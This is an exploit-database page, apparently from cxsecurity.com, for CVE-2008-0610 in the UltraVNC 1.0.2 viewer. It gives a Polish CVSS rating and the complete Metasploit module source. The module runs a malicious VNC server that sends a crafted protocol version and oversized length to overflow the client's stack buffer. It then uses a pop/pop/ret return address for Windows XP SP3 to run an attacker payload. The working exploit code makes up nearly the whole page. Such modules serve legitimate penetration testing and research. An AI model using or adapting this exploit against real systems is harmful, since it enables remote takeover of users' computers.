UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow

2012.03.27
Credit: noperand
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack. }, 'Author' => 'noperand', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2008-0610' ], [ 'OSVDB', '42840' ], [ 'BID', '27561' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2 ], 'Privileged' => false, 'DisclosureDate' => 'Feb 6 2008', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) sploit = rand_text_alpha(1100) # junk, could be more efficient here sploit << "\x00\x04\x00\x00" # value to get around a write sploit << rand_text_alpha(12) # random junk sploit << "\xEB\x06" << make_nops(2) # short relative jump sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe) sploit << payload.encoded =begin We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016"). - These bytes are read directly by a call to ReadExact() with a size of 12. ... if (m_minorVersion == 14 || m_minorVersion == 16) { int size; ReadExact((char *)&size,sizeof(int)); char mytext[1024]; //10k ReadExact(mytext,size); mytext[size]=0; ... If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read. We then append our data. =end sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") client.put(sploit) handler(client) service.close_client(client) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top